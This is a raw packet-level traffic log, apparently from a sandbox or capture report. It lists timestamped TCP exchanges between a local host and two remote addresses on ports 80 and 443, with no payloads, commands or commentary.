                                                                                                                                                                              Nov 21, 2024 08:30:36.311963081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.311991930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.312535048 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.312812090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.312855959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.312948942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.313672066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.313790083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.313838959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.314657927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.314709902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.314748049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.315474987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.315526009 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.315681934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.316368103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.316395998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.316411972 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.332999945 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.343183041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.358328104 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.358419895 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.358556032 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.358701944 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.358725071 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.358760118 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.358767033 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.361601114 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.361654997 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.361793995 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.361983061 CET49769443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:36.361991882 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.472168922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.472213984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.472284079 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.472440958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.472599983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.472645998 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.473340034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.473712921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.473757982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.473771095 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.474716902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.474734068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.474787951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.475444078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.475493908 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.475542068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.476290941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.476332903 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.476385117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.477186918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.477227926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.477277040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.478075981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.478111029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.478135109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.478936911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.479049921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.479053974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.479818106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.479902983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.479932070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.480777025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.480833054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.480981112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.481637001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.481689930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.481715918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.482469082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.482512951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.482558966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.483367920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.483474970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.483522892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.484256983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.484303951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.484357119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.485146046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.485266924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.485316992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.486000061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.486047983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.486093044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.486903906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.486943960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.486957073 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.487778902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.487822056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.487829924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.488646030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.488792896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.488806963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.489554882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.489588022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.489662886 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.490425110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.490528107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.490535021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.491322041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.491410971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.491440058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.492197990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.492324114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.492326021 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.493088007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.493187904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.493236065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.493966103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.494010925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.494067907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.494858980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.494936943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.494987965 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.495738983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.495791912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.495821953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.496589899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.496634960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.496722937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.497513056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.497556925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.497617006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.498383999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.498435020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.498481035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.499253988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.499303102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.499362946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.500149965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.500196934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.500266075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.501024961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.501071930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.501137018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.501940966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.501988888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.502032995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.502811909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.502854109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.502918959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.503679037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.503740072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.503848076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.504611015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.504700899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.504733086 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.505412102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.505510092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.505552053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.505676031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.506387949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.506515026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.506556988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.507292986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.507333040 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.507373095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.508223057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.508270979 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.508337021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.509021044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.509072065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.509138107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.509984016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.510030985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.510097980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.510807037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.510859966 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.510885954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.511697054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.511776924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.511797905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.512578964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.512660027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.512710094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.513461113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.513509989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.513662100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.514344931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.514410973 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.514426947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.515242100 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.515295029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.515377998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.516113043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.516161919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.516237020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.516988039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.517044067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.517069101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.517852068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.517906904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.517909050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.518059015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.673719883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.673819065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.673866987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.674076080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.674216986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.674261093 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.675010920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.675142050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.675200939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.675833941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.675961018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.676038980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.676714897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.676830053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.676939964 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.677599907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.677767992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.677810907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.678486109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.678611994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.678662062 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.679358006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.679486990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.679555893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.680259943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.680357933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.680409908 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.681135893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.681257010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.681298018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.682013035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.682133913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.682225943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.682905912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.683016062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.683067083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.683808088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.684060097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.684109926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.684737921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.684868097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.684926033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.685611963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.685714960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.685758114 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.686419964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.686553955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.686638117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.687418938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.687546968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.688196898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.688235044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.688332081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.688375950 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.689095020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.689184904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.689224005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.689985037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.690110922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.690160036 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.690881968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.690989017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.691077948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.691778898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.691888094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.691935062 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.692625046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.692738056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.692815065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.693506956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.693587065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.693654060 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.694405079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.694516897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.694600105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.695298910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.695413113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.695502996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.696173906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.696314096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.696372986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.697046995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.697230101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.697273970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.697552919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.697957039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.698056936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.698810101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.698856115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.698936939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.698983908 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.699693918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.699816942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.699861050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.700608969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.700728893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.700766087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:36.701500893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.701638937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:36.701724052 CET4976280192.168.2.6185.215.113.16
